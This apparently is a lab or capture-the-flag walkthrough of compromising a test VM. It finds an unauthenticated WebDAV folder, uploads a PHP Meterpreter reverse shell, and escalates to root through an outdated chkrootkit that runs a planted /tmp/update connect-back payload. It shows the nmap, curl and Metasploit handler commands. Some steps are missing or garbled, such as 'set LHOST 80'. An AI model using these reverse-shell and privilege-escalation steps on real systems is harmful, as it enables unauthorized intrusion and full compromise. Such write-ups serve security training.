Executive Summary

This machine had an unprotected folder which allowed uploading of malicious PHP code which could then be executed remotely. An attacker could then create an unprivileged shell on the victim machine and begin to explore the system for additional vulnerabilities which could lead to a full compromise. During the exploration, an outdated version of chkrootkit was found. By exploiting a known vulnerability in the way chkrootkit parses arguments, an attacker could create a malicious file that would later be run by chkrootkit as a fully privileged user.

Tools used

  • nmap - discovery
  • uniscan - web application scanner
  • metasploit - exploit framework
  • msfvenom - payload generation
  • local-linux-enum script - enumeration

Proof of Concept

In order to cut down on typing, once the IP of the victim computer is discovered, it can be added to the /etc/hosts.

echo " vm" >> /etc/hosts

We begin with scanning the victim’s machine and find ports 80 and 22.

❯❯ nmap -p - -A vm | tee nmap.scan

Navigating to the page and checking its source code reveals nothing

Running uniscan, a folder named test is discovered

❯❯ uniscan -qweds -u http://vm/ 

The listing appeared to be empty but further examination of the /test path revealed that it responded to more than just HTTP methods. COPY and MOVE seemed to indicate WebDAV.

❯❯ curl -vX OPTIONS vm/test

This path requires no authentication and thus allows attackers to upload files to the web server.

Verifying successful upload:

Having uploaded the reverse shell, the Meterpreter handler is constructed

set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 80
run -j

…and the payload is activated.

curl http://vm/test/sshhh.php

Once a shell has been established on the system, an enumeration script reveals what additional vulnerabilities might lead to a full compromise.

The installed version of chkrootkit is outdated and vulnerable to a code execution exploit.

The ExploitDB gives the following description:

Using Metasploit, we create another handler and payload, using the chkrootkit module. This module will create/overwrite the /tmp/update file with the reverse tcp shell of your choosing. The next time chkrootkit is run, this update file will connect back to the attacker computer designated in the payload.